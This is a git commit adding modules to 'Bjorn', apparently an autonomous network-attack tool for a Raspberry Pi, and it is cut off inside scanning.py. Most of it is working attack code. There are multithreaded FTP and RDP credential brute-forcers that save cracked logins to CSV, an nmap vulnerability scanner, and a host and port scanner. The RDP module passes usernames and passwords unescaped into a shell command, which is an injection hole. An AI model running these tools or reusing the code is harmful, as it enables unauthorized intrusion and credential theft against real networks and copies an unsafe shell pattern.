First Bjorn Commit!

Fabien POLLY
2024-11-07 16:39:14 +01:00
parent 10ffdfa103
commit 5724ce6bb6
232 changed files with 12441 additions and 385 deletions

actions/IDLE.py (new file, +20 lines)

@@ -0,0 +1,20 @@
#Test script to add more actions to BJORN
from rich.console import Console
from shared import SharedData
b_class = "IDLE"
b_module = "idle_action"
b_status = "idle_action"
b_port = None
b_parent = None
console = Console()
class IDLE:
def __init__(self, shared_data):
self.shared_data = shared_data
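
Every action file added in this commit exposes the same module-level metadata (b_class, b_module, b_status, b_port, b_parent) next to a class whose name matches b_class, and IDLE.py is the minimal template for it. As a hedged illustration only (not code from this commit), an orchestrator could use that convention to load an action dynamically; the "actions.IDLE" dotted path below is an assumed package layout.

# Hypothetical loader sketch, illustrating the b_class convention; not part of this commit.
import importlib

from shared import SharedData

def load_action(module_path, shared_data):
    """Import an action module by dotted path and instantiate the class named in b_class."""
    module = importlib.import_module(module_path)   # e.g. "actions.IDLE" (assumed layout)
    action_cls = getattr(module, module.b_class)    # b_class = "IDLE" -> class IDLE
    return module, action_cls(shared_data)

if __name__ == "__main__":
    module, action = load_action("actions.IDLE", SharedData())
    print(module.b_module, module.b_status, module.b_port)   # -> idle_action idle_action None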

actions/__init__.py (new, empty file)

actions/ftp_connector.py (new file, +190 lines)

@@ -0,0 +1,190 @@
import os
import pandas as pd
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from ftplib import FTP
from queue import Queue
from shared import SharedData
from logger import Logger
logger = Logger(name="ftp_connector.py", level=logging.DEBUG)
b_class = "FTPBruteforce"
b_module = "ftp_connector"
b_status = "brute_force_ftp"
b_port = 21
b_parent = None
class FTPBruteforce:
"""
This class handles the FTP brute force attack process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.ftp_connector = FTPConnector(shared_data)
logger.info("FTPConnector initialized.")
def bruteforce_ftp(self, ip, port):
"""
Initiates the brute force attack on the given IP and port.
"""
return self.ftp_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Executes the brute force attack and updates the shared data status.
"""
self.shared_data.bjornorch_status = "FTPBruteforce"
# Pause briefly so the status change remains visible before the attack starts
time.sleep(5)
logger.info(f"Brute forcing FTP on {ip}:{port}...")
success, results = self.bruteforce_ftp(ip, port)
return 'success' if success else 'failed'
class FTPConnector:
"""
This class manages the FTP connection attempts using different usernames and passwords.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("21", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.ftpfile = shared_data.ftpfile
if not os.path.exists(self.ftpfile):
logger.info(f"File {self.ftpfile} does not exist. Creating...")
with open(self.ftpfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = []
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for FTP ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("21", na=False)]
def ftp_connect(self, adresse_ip, user, password):
"""
Attempts to connect to the FTP server using the provided username and password.
"""
try:
conn = FTP()
conn.connect(adresse_ip, 21)
conn.login(user, password)
conn.quit()
logger.info(f"Access to FTP successful on {adresse_ip} with user '{user}'")
return True
except Exception as e:
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.ftp_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing FTP...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Saves the results of successful FTP connections to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.ftpfile, index=False, mode='a', header=not os.path.exists(self.ftpfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Removes duplicate entries from the results file.
"""
df = pd.read_csv(self.ftpfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.ftpfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
ftp_bruteforce = FTPBruteforce(shared_data)
logger.info("[bold green]Starting FTP attack...on port 21[/bold green]")
# Load the IPs to scan from shared data
ips_to_scan = shared_data.read_data()
# Execute brute force attack on each IP
for row in ips_to_scan:
ip = row["IPs"]
ftp_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Total successful attempts: {len(ftp_bruteforce.ftp_connector.results)}")
exit(len(ftp_bruteforce.ftp_connector.results))
except Exception as e:
logger.error(f"Error: {e}")

actions/log_standalone.py (new file, +34 lines)

@@ -0,0 +1,34 @@
#Test script to add more actions to BJORN
import logging
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="log_standalone.py", level=logging.INFO)
# Define the necessary global variables
b_class = "LogStandalone"
b_module = "log_standalone"
b_status = "log_standalone"
b_port = 0 # Indicate this is a standalone action
class LogStandalone:
"""
Class to handle the standalone log action.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
logger.info("LogStandalone initialized")
def execute(self):
"""
Execute the standalone log action.
"""
try:
logger.info("Executing standalone log action.")
logger.info("This is a test log message for the standalone action.")
return 'success'
except Exception as e:
logger.error(f"Error executing standalone log action: {e}")
return 'failed'

actions/log_standalone2.py (new file, +34 lines)

@@ -0,0 +1,34 @@
#Test script to add more actions to BJORN
import logging
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="log_standalone2.py", level=logging.INFO)
# Define the necessary global variables
b_class = "LogStandalone2"
b_module = "log_standalone2"
b_status = "log_standalone2"
b_port = 0 # Indicate this is a standalone action
class LogStandalone2:
"""
Class to handle the standalone log action.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
logger.info("LogStandalone initialized")
def execute(self):
"""
Execute the standalone log action.
"""
try:
logger.info("Executing standalone log action.")
logger.info("This is a test log message for the standalone action.")
return 'success'
except Exception as e:
logger.error(f"Error executing standalone log action: {e}")
return 'failed'

actions/nmap_vuln_scanner.py (new file, +188 lines)

@@ -0,0 +1,188 @@
# nmap_vuln_scanner.py
# This script performs vulnerability scanning using Nmap on specified IP addresses.
# It scans for vulnerabilities on various ports and saves the results and progress.
import os
import pandas as pd
import subprocess
import logging
from datetime import datetime
from concurrent.futures import ThreadPoolExecutor, as_completed
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn
from shared import SharedData
from logger import Logger
logger = Logger(name="nmap_vuln_scanner.py", level=logging.INFO)
b_class = "NmapVulnScanner"
b_module = "nmap_vuln_scanner"
b_status = "vuln_scan"
b_port = None
b_parent = None
class NmapVulnScanner:
"""
This class handles the Nmap vulnerability scanning process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan_results = []
self.summary_file = self.shared_data.vuln_summary_file
self.create_summary_file()
logger.debug("NmapVulnScanner initialized.")
def create_summary_file(self):
"""
Creates a summary file for vulnerabilities if it does not exist.
"""
if not os.path.exists(self.summary_file):
os.makedirs(self.shared_data.vulnerabilities_dir, exist_ok=True)
df = pd.DataFrame(columns=["IP", "Hostname", "MAC Address", "Port", "Vulnerabilities"])
df.to_csv(self.summary_file, index=False)
def update_summary_file(self, ip, hostname, mac, port, vulnerabilities):
"""
Updates the summary file with the scan results.
"""
try:
# Read existing data
df = pd.read_csv(self.summary_file)
# Create new data entry
new_data = pd.DataFrame([{"IP": ip, "Hostname": hostname, "MAC Address": mac, "Port": port, "Vulnerabilities": vulnerabilities}])
# Append new data
df = pd.concat([df, new_data], ignore_index=True)
# Remove duplicates based on IP and MAC Address, keeping the last occurrence
df.drop_duplicates(subset=["IP", "MAC Address"], keep='last', inplace=True)
# Save the updated data back to the summary file
df.to_csv(self.summary_file, index=False)
except Exception as e:
logger.error(f"Error updating summary file: {e}")
def scan_vulnerabilities(self, ip, hostname, mac, ports):
combined_result = ""
success = True # Initialize to True, will become False if an error occurs
try:
self.shared_data.bjornstatustext2 = ip
# Proceed with scanning if ports are not already scanned
logger.info(f"Scanning {ip} on ports {','.join(ports)} for vulnerabilities with aggressivity {self.shared_data.nmap_scan_aggressivity}")
result = subprocess.run(
["nmap", self.shared_data.nmap_scan_aggressivity, "-sV", "--script", "vulners.nse", "-p", ",".join(ports), ip],
capture_output=True, text=True
)
combined_result += result.stdout
vulnerabilities = self.parse_vulnerabilities(result.stdout)
self.update_summary_file(ip, hostname, mac, ",".join(ports), vulnerabilities)
except Exception as e:
logger.error(f"Error scanning {ip}: {e}")
success = False # Mark as failed if an error occurs
return combined_result if success else None
def execute(self, ip, row, status_key):
"""
Executes the vulnerability scan for a given IP and row data.
"""
self.shared_data.bjornorch_status = "NmapVulnScanner"
ports = row["Ports"].split(";")
scan_result = self.scan_vulnerabilities(ip, row["Hostnames"], row["MAC Address"], ports)
if scan_result is not None:
self.scan_results.append((ip, row["Hostnames"], row["MAC Address"]))
self.save_results(row["MAC Address"], ip, scan_result)
return 'success'
else:
return 'success' # Treat a failed scan as a success: the vulnerability scan only needs to be attempted once per host
# return 'failed'
def parse_vulnerabilities(self, scan_result):
"""
Parses the Nmap scan result to extract vulnerabilities.
"""
vulnerabilities = set()
capture = False
for line in scan_result.splitlines():
if "VULNERABLE" in line or "CVE-" in line or "*EXPLOIT*" in line:
capture = True
if capture:
if line.strip() and not line.startswith('|_'):
vulnerabilities.add(line.strip())
else:
capture = False
return "; ".join(vulnerabilities)
def save_results(self, mac_address, ip, scan_result):
"""
Saves the detailed scan results to a file.
"""
try:
sanitized_mac_address = mac_address.replace(":", "")
result_dir = self.shared_data.vulnerabilities_dir
os.makedirs(result_dir, exist_ok=True)
result_file = os.path.join(result_dir, f"{sanitized_mac_address}_{ip}_vuln_scan.txt")
# Open the file in write mode to clear its contents if it exists, then close it
if os.path.exists(result_file):
open(result_file, 'w').close()
# Write the new scan result to the file
with open(result_file, 'w') as file:
file.write(scan_result)
logger.info(f"Results saved to {result_file}")
except Exception as e:
logger.error(f"Error saving scan results for {ip}: {e}")
def save_summary(self):
"""
Saves a summary of all scanned vulnerabilities to a final summary file.
"""
try:
final_summary_file = os.path.join(self.shared_data.vulnerabilities_dir, "final_vulnerability_summary.csv")
df = pd.read_csv(self.summary_file)
summary_data = df.groupby(["IP", "Hostname", "MAC Address"])["Vulnerabilities"].apply(lambda x: "; ".join(set("; ".join(x).split("; ")))).reset_index()
summary_data.to_csv(final_summary_file, index=False)
logger.info(f"Summary saved to {final_summary_file}")
except Exception as e:
logger.error(f"Error saving summary: {e}")
if __name__ == "__main__":
shared_data = SharedData()
try:
nmap_vuln_scanner = NmapVulnScanner(shared_data)
logger.info("Starting vulnerability scans...")
# Load the netkbfile and get the IPs to scan
ips_to_scan = shared_data.read_data() # Use your existing method to read the data
# Execute the scan on each IP with concurrency
with Progress(
TextColumn("[progress.description]{task.description}"),
BarColumn(),
"[progress.percentage]{task.percentage:>3.1f}%",
console=Console()
) as progress:
task = progress.add_task("Scanning vulnerabilities...", total=len(ips_to_scan))
futures = []
with ThreadPoolExecutor(max_workers=2) as executor: # Adjust the number of workers for RPi Zero
for row in ips_to_scan:
if row["Alive"] == '1': # Check if the host is alive
ip = row["IPs"]
futures.append(executor.submit(nmap_vuln_scanner.execute, ip, row, b_status))
for future in as_completed(futures):
progress.update(task, advance=1)
nmap_vuln_scanner.save_summary()
logger.info(f"Total scans performed: {len(nmap_vuln_scanner.scan_results)}")
exit(len(nmap_vuln_scanner.scan_results))
except Exception as e:
logger.error(f"Error: {e}")

actions/rdp_connector.py (new file, +198 lines)

@@ -0,0 +1,198 @@
"""
rdp_connector.py - This script performs a brute force attack on RDP services (port 3389) to find accessible accounts using various user credentials. It logs the results of successful connections.
"""
import os
import pandas as pd
import subprocess
import threading
import logging
import time
from rich.console import Console
from rich.progress import Progress, BarColumn, TextColumn, SpinnerColumn
from queue import Queue
from shared import SharedData
from logger import Logger
# Configure the logger
logger = Logger(name="rdp_connector.py", level=logging.DEBUG)
# Define the necessary global variables
b_class = "RDPBruteforce"
b_module = "rdp_connector"
b_status = "brute_force_rdp"
b_port = 3389
b_parent = None
class RDPBruteforce:
"""
Class to handle the RDP brute force process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.rdp_connector = RDPConnector(shared_data)
logger.info("RDPConnector initialized.")
def bruteforce_rdp(self, ip, port):
"""
Run the RDP brute force attack on the given IP and port.
"""
logger.info(f"Running bruteforce_rdp on {ip}:{port}...")
return self.rdp_connector.run_bruteforce(ip, port)
def execute(self, ip, port, row, status_key):
"""
Execute the brute force attack and update status.
"""
logger.info(f"Executing RDPBruteforce on {ip}:{port}...")
self.shared_data.bjornorch_status = "RDPBruteforce"
success, results = self.bruteforce_rdp(ip, port)
return 'success' if success else 'failed'
class RDPConnector:
"""
Class to manage the connection attempts and store the results.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.scan = pd.read_csv(shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3389", na=False)]
self.users = open(shared_data.usersfile, "r").read().splitlines()
self.passwords = open(shared_data.passwordsfile, "r").read().splitlines()
self.lock = threading.Lock()
self.rdpfile = shared_data.rdpfile
# If the file doesn't exist, it will be created
if not os.path.exists(self.rdpfile):
logger.info(f"File {self.rdpfile} does not exist. Creating...")
with open(self.rdpfile, "w") as f:
f.write("MAC Address,IP Address,Hostname,User,Password,Port\n")
self.results = [] # List to store results temporarily
self.queue = Queue()
self.console = Console()
def load_scan_file(self):
"""
Load the netkb file and filter it for RDP ports.
"""
self.scan = pd.read_csv(self.shared_data.netkbfile)
if "Ports" not in self.scan.columns:
self.scan["Ports"] = None
self.scan = self.scan[self.scan["Ports"].str.contains("3389", na=False)]
def rdp_connect(self, adresse_ip, user, password):
"""
Attempt to connect to an RDP service using the given credentials.
"""
command = f"xfreerdp /v:{adresse_ip} /u:{user} /p:{password} /cert:ignore +auth-only"
try:
process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = process.communicate()
if process.returncode == 0:
return True
else:
return False
except subprocess.SubprocessError as e:
return False
def worker(self, progress, task_id, success_flag):
"""
Worker thread to process items in the queue.
"""
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping worker thread.")
break
adresse_ip, user, password, mac_address, hostname, port = self.queue.get()
if self.rdp_connect(adresse_ip, user, password):
with self.lock:
self.results.append([mac_address, adresse_ip, hostname, user, password, port])
logger.success(f"Found credentials for IP: {adresse_ip} | User: {user} | Password: {password}")
self.save_results()
self.removeduplicates()
success_flag[0] = True
self.queue.task_done()
progress.update(task_id, advance=1)
def run_bruteforce(self, adresse_ip, port):
self.load_scan_file() # Reload the scan file to get the latest IPs and ports
mac_address = self.scan.loc[self.scan['IPs'] == adresse_ip, 'MAC Address'].values[0]
hostname = self.scan.loc[self.scan['IPs'] == adresse_ip, 'Hostnames'].values[0]
total_tasks = len(self.users) * len(self.passwords)
for user in self.users:
for password in self.passwords:
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce task addition.")
return False, []
self.queue.put((adresse_ip, user, password, mac_address, hostname, port))
success_flag = [False]
threads = []
with Progress(SpinnerColumn(), TextColumn("[progress.description]{task.description}"), BarColumn(), TextColumn("[progress.percentage]{task.percentage:>3.0f}%")) as progress:
task_id = progress.add_task("[cyan]Bruteforcing RDP...", total=total_tasks)
for _ in range(40): # Adjust the number of threads based on the RPi Zero's capabilities
t = threading.Thread(target=self.worker, args=(progress, task_id, success_flag))
t.start()
threads.append(t)
while not self.queue.empty():
if self.shared_data.orchestrator_should_exit:
logger.info("Orchestrator exit signal received, stopping bruteforce.")
while not self.queue.empty():
self.queue.get()
self.queue.task_done()
break
self.queue.join()
for t in threads:
t.join()
return success_flag[0], self.results # Return True and the list of successes if at least one attempt was successful
def save_results(self):
"""
Save the results of successful connection attempts to a CSV file.
"""
df = pd.DataFrame(self.results, columns=['MAC Address', 'IP Address', 'Hostname', 'User', 'Password', 'Port'])
df.to_csv(self.rdpfile, index=False, mode='a', header=not os.path.exists(self.rdpfile))
self.results = [] # Reset temporary results after saving
def removeduplicates(self):
"""
Remove duplicate entries from the results CSV file.
"""
df = pd.read_csv(self.rdpfile)
df.drop_duplicates(inplace=True)
df.to_csv(self.rdpfile, index=False)
if __name__ == "__main__":
shared_data = SharedData()
try:
rdp_bruteforce = RDPBruteforce(shared_data)
logger.info("Démarrage de l'attaque RDP... sur le port 3389")
# Load the netkb file and get the IPs to scan
ips_to_scan = shared_data.read_data()
# Execute the brute force on each IP
for row in ips_to_scan:
ip = row["IPs"]
logger.info(f"Executing RDPBruteforce on {ip}...")
rdp_bruteforce.execute(ip, b_port, row, b_status)
logger.info(f"Nombre total de succès: {len(rdp_bruteforce.rdp_connector.results)}")
exit(len(rdp_bruteforce.rdp_connector.results))
except Exception as e:
logger.error(f"Erreur: {e}")

actions/scanning.py (new file, +589 lines)

@@ -0,0 +1,589 @@
#scanning.py
# This script performs a network scan to identify live hosts, their MAC addresses, and open ports.
# The results are saved to CSV files and displayed using Rich for enhanced visualization.
import os
import threading
import csv
import pandas as pd
import socket
import netifaces
import time
import glob
import logging
from datetime import datetime
from rich.console import Console
from rich.table import Table
from rich.text import Text
from rich.progress import Progress
from getmac import get_mac_address as gma
from shared import SharedData
from logger import Logger
import ipaddress
import nmap
logger = Logger(name="scanning.py", level=logging.DEBUG)
b_class = "NetworkScanner"
b_module = "scanning"
b_status = "network_scanner"
b_port = None
b_parent = None
b_priority = 1
class NetworkScanner:
"""
This class handles the entire network scanning process.
"""
def __init__(self, shared_data):
self.shared_data = shared_data
self.logger = logger
self.displaying_csv = shared_data.displaying_csv
self.blacklistcheck = shared_data.blacklistcheck
self.mac_scan_blacklist = shared_data.mac_scan_blacklist
self.ip_scan_blacklist = shared_data.ip_scan_blacklist
self.console = Console()
self.lock = threading.Lock()
self.currentdir = shared_data.currentdir
self.semaphore = threading.Semaphore(200) # Limit the number of concurrent port-scan threads to 200
self.nm = nmap.PortScanner() # Initialize nmap.PortScanner()
self.running = False
def check_if_csv_scan_file_exists(self, csv_scan_file, csv_result_file, netkbfile):
"""
Checks and prepares the necessary CSV files for the scan.
"""
with self.lock:
try:
if not os.path.exists(os.path.dirname(csv_scan_file)):
os.makedirs(os.path.dirname(csv_scan_file))
if not os.path.exists(os.path.dirname(netkbfile)):
os.makedirs(os.path.dirname(netkbfile))
if os.path.exists(csv_scan_file):
os.remove(csv_scan_file)
if os.path.exists(csv_result_file):
os.remove(csv_result_file)
if not os.path.exists(netkbfile):
with open(netkbfile, 'w', newline='') as file:
writer = csv.writer(file)
writer.writerow(['MAC Address', 'IPs', 'Hostnames', 'Alive', 'Ports'])
except Exception as e:
self.logger.error(f"Error in check_if_csv_scan_file_exists: {e}")
def get_current_timestamp(self):
"""
Returns the current timestamp in a specific format.
"""
return datetime.now().strftime("%Y%m%d_%H%M%S")
def ip_key(self, ip):
"""
Converts an IP address to a tuple of integers for sorting.
"""
if ip == "STANDALONE":
return (0, 0, 0, 0)
try:
return tuple(map(int, ip.split('.')))
except ValueError as e:
self.logger.error(f"Error in ip_key: {e}")
return (0, 0, 0, 0)
def sort_and_write_csv(self, csv_scan_file):
"""
Sorts the CSV file based on IP addresses and writes the sorted content back to the file.
"""
with self.lock:
try:
with open(csv_scan_file, 'r') as file:
lines = file.readlines()
sorted_lines = [lines[0]] + sorted(lines[1:], key=lambda x: self.ip_key(x.split(',')[0]))
with open(csv_scan_file, 'w') as file:
file.writelines(sorted_lines)
except Exception as e:
self.logger.error(f"Error in sort_and_write_csv: {e}")
class GetIpFromCsv:
"""
Helper class to retrieve IP addresses, hostnames, and MAC addresses from a CSV file.
"""
def __init__(self, outer_instance, csv_scan_file):
self.outer_instance = outer_instance
self.csv_scan_file = csv_scan_file
self.ip_list = []
self.hostname_list = []
self.mac_list = []
self.get_ip_from_csv()
def get_ip_from_csv(self):
"""
Reads IP addresses, hostnames, and MAC addresses from the CSV file.
"""
with self.outer_instance.lock:
try:
with open(self.csv_scan_file, 'r') as csv_scan_file:
csv_reader = csv.reader(csv_scan_file)
next(csv_reader)
for row in csv_reader:
if row[0] == "STANDALONE" or row[1] == "STANDALONE" or row[2] == "STANDALONE":
continue
if not self.outer_instance.blacklistcheck or (row[2] not in self.outer_instance.mac_scan_blacklist and row[0] not in self.outer_instance.ip_scan_blacklist):
self.ip_list.append(row[0])
self.hostname_list.append(row[1])
self.mac_list.append(row[2])
except Exception as e:
self.outer_instance.logger.error(f"Error in get_ip_from_csv: {e}")
def update_netkb(self, netkbfile, netkb_data, alive_macs):
"""
Updates the net knowledge base (netkb) file with the scan results.
"""
with self.lock:
try:
netkb_entries = {}
existing_action_columns = []
# Read existing CSV file
if os.path.exists(netkbfile):
with open(netkbfile, 'r') as file:
reader = csv.DictReader(file)
existing_headers = reader.fieldnames
existing_action_columns = [header for header in existing_headers if header not in ["MAC Address", "IPs", "Hostnames", "Alive", "Ports"]]
for row in reader:
mac = row["MAC Address"]
ips = row["IPs"].split(';')
hostnames = row["Hostnames"].split(';')
alive = row["Alive"]
ports = row["Ports"].split(';')
netkb_entries[mac] = {
'IPs': set(ips) if ips[0] else set(),
'Hostnames': set(hostnames) if hostnames[0] else set(),
'Alive': alive,
'Ports': set(ports) if ports[0] else set()
}
for action in existing_action_columns:
netkb_entries[mac][action] = row.get(action, "")
ip_to_mac = {} # Dictionary to track IP to MAC associations
for data in netkb_data:
mac, ip, hostname, ports = data
if not mac or mac == "STANDALONE" or ip == "STANDALONE" or hostname == "STANDALONE":
continue
# Check if MAC address is "00:00:00:00:00:00"
if mac == "00:00:00:00:00:00":
continue
if self.blacklistcheck and (mac in self.mac_scan_blacklist or ip in self.ip_scan_blacklist):
continue
# Check if IP is already associated with a different MAC
if ip in ip_to_mac and ip_to_mac[ip] != mac:
# Mark the old MAC as not alive
old_mac = ip_to_mac[ip]
if old_mac in netkb_entries:
netkb_entries[old_mac]['Alive'] = '0'
# Update or create entry for the new MAC
ip_to_mac[ip] = mac
if mac in netkb_entries:
netkb_entries[mac]['IPs'].add(ip)
netkb_entries[mac]['Hostnames'].add(hostname)
netkb_entries[mac]['Alive'] = '1'
netkb_entries[mac]['Ports'].update(map(str, ports))
else:
netkb_entries[mac] = {
'IPs': {ip},
'Hostnames': {hostname},
'Alive': '1',
'Ports': set(map(str, ports))
}
for action in existing_action_columns:
netkb_entries[mac][action] = ""
# Update all existing entries to mark missing hosts as not alive
for mac in netkb_entries:
if mac not in alive_macs:
netkb_entries[mac]['Alive'] = '0'
# Remove entries with multiple IP addresses for a single MAC address
netkb_entries = {mac: data for mac, data in netkb_entries.items() if len(data['IPs']) == 1}
sorted_netkb_entries = sorted(netkb_entries.items(), key=lambda x: self.ip_key(sorted(x[1]['IPs'])[0]))
with open(netkbfile, 'w', newline='') as file:
writer = csv.writer(file)
writer.writerow(existing_headers) # Use existing headers
for mac, data in sorted_netkb_entries:
row = [
mac,
';'.join(sorted(data['IPs'], key=self.ip_key)),
';'.join(sorted(data['Hostnames'])),
data['Alive'],
';'.join(sorted(data['Ports'], key=int))
]
row.extend(data.get(action, "") for action in existing_action_columns)
writer.writerow(row)
except Exception as e:
self.logger.error(f"Error in update_netkb: {e}")
def display_csv(self, file_path):
"""
Displays the contents of the specified CSV file using Rich for enhanced visualization.
"""
with self.lock:
try:
table = Table(title=f"Contents of {file_path}", show_lines=True)
with open(file_path, 'r') as file:
reader = csv.reader(file)
headers = next(reader)
for header in headers:
table.add_column(header, style="cyan", no_wrap=True)
for row in reader:
formatted_row = [Text(cell, style="green bold") if cell else Text("", style="on red") for cell in row]
table.add_row(*formatted_row)
self.console.print(table)
except Exception as e:
self.logger.error(f"Error in display_csv: {e}")
def get_network(self):
"""
Retrieves the network information including the default gateway and subnet.
"""
try:
gws = netifaces.gateways()
default_gateway = gws['default'][netifaces.AF_INET][1]
iface = netifaces.ifaddresses(default_gateway)[netifaces.AF_INET][0]
ip_address = iface['addr']
netmask = iface['netmask']
cidr = sum([bin(int(x)).count('1') for x in netmask.split('.')])
network = ipaddress.IPv4Network(f"{ip_address}/{cidr}", strict=False)
self.logger.info(f"Network: {network}")
return network
except Exception as e:
self.logger.error(f"Error in get_network: {e}")
def get_mac_address(self, ip, hostname):
"""
Retrieves the MAC address for the given IP address and hostname.
"""
try:
mac = None
retries = 5
while not mac and retries > 0:
mac = gma(ip=ip)
if not mac:
time.sleep(2) # Wait 2 seconds before retrying
retries -= 1
if not mac:
mac = f"{ip}_{hostname}" if hostname else f"{ip}_NoHostname"
return mac
except Exception as e:
self.logger.error(f"Error in get_mac_address: {e}")
return None
class PortScanner:
"""
Helper class to perform port scanning on a target IP.
"""
def __init__(self, outer_instance, target, open_ports, portstart, portend, extra_ports):
self.outer_instance = outer_instance
self.logger = logger
self.target = target
self.open_ports = open_ports
self.portstart = portstart
self.portend = portend
self.extra_ports = extra_ports
def scan(self, port):
"""
Scans a specific port on the target IP.
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(2)
try:
s.connect((self.target, port))
self.open_ports[self.target].append(port)
except OSError:
pass
finally:
s.close() # Ensure the socket is closed
def start(self):
"""
Starts the port scanning process for the specified range and extra ports.
"""
try:
for port in range(self.portstart, self.portend):
t = threading.Thread(target=self.scan_with_semaphore, args=(port,))
t.start()
for port in self.extra_ports:
t = threading.Thread(target=self.scan_with_semaphore, args=(port,))
t.start()
except Exception as e:
self.logger.info(f"Maximum threads defined in the semaphore reached: {e}")
def scan_with_semaphore(self, port):
"""
Scans a port using a semaphore to limit concurrent threads.
"""
with self.outer_instance.semaphore:
self.scan(port)
class ScanPorts:
"""
Helper class to manage the overall port scanning process for a network.
"""
def __init__(self, outer_instance, network, portstart, portend, extra_ports):
self.outer_instance = outer_instance
self.logger = logger
self.progress = 0
self.network = network
self.portstart = portstart
self.portend = portend
self.extra_ports = extra_ports
self.currentdir = outer_instance.currentdir
self.scan_results_dir = outer_instance.shared_data.scan_results_dir
self.timestamp = outer_instance.get_current_timestamp()
self.csv_scan_file = os.path.join(self.scan_results_dir, f'scan_{network.network_address}_{self.timestamp}.csv')
self.csv_result_file = os.path.join(self.scan_results_dir, f'result_{network.network_address}_{self.timestamp}.csv')
self.netkbfile = outer_instance.shared_data.netkbfile
self.ip_data = None
self.open_ports = {}
self.all_ports = []
self.ip_hostname_list = []
def scan_network_and_write_to_csv(self):
"""
Scans the network and writes the results to a CSV file.
"""
self.outer_instance.check_if_csv_scan_file_exists(self.csv_scan_file, self.csv_result_file, self.netkbfile)
with self.outer_instance.lock:
try:
with open(self.csv_scan_file, 'a', newline='') as file:
writer = csv.writer(file)
writer.writerow(['IP', 'Hostname', 'MAC Address'])
except Exception as e:
self.outer_instance.logger.error(f"Error in scan_network_and_write_to_csv (initial write): {e}")
# Use nmap to scan for live hosts
self.outer_instance.nm.scan(hosts=str(self.network), arguments='-sn')
for host in self.outer_instance.nm.all_hosts():
t = threading.Thread(target=self.scan_host, args=(host,))
t.start()
time.sleep(5)
self.outer_instance.sort_and_write_csv(self.csv_scan_file)
def scan_host(self, ip):
"""
Scans a specific host to check if it is alive and retrieves its hostname and MAC address.
"""
if self.outer_instance.blacklistcheck and ip in self.outer_instance.ip_scan_blacklist:
return
try:
hostname = self.outer_instance.nm[ip].hostname() if self.outer_instance.nm[ip].hostname() else ''
mac = self.outer_instance.get_mac_address(ip, hostname)
if not self.outer_instance.blacklistcheck or mac not in self.outer_instance.mac_scan_blacklist:
with self.outer_instance.lock:
with open(self.csv_scan_file, 'a', newline='') as file:
writer = csv.writer(file)
writer.writerow([ip, hostname, mac])
self.ip_hostname_list.append((ip, hostname, mac))
except Exception as e:
self.outer_instance.logger.error(f"Error getting MAC address or writing to file for IP {ip}: {e}")
self.progress += 1
time.sleep(0.1) # Adding a small delay to avoid overwhelming the network
def get_progress(self):
"""
